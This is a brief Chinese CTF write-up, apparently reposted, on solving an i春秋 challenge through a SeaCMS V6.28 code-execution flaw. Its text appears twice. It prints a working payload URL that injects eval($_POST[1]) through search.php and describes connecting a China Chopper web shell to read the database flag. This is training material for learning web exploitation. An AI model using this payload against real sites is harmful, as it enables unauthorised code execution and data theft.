題目在i春秋ctf訓練營
又是一道cms的通用漏洞的題,直接去百度查看通用漏洞
這里我使用的是以下這個漏洞:
海洋CMS V6.28代碼執行0day
按照給出的payload,直接訪問url+/search.php?searchtype=5&tid=&area=eval($_POST[1])
之后用菜刀連接,但乍一看並沒有flag.php
反手去查了一下海洋cms的數據庫配置文件的存放地址:
出去用菜刀連接數據庫
編輯完成后右鍵數據庫管理,可以看到flag了
題目在i春秋ctf訓練營
又是一道cms的通用漏洞的題,直接去百度查看通用漏洞
這里我使用的是以下這個漏洞:
按照給出的payload,直接訪問url+/search.php?searchtype=5&tid=&area=eval($_POST[1])
之后用菜刀連接,但乍一看並沒有flag.php
反手去查了一下海洋cms的數據庫配置文件的存放地址:
出去用菜刀連接數據庫
編輯完成后右鍵數據庫管理,可以看到flag了
本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。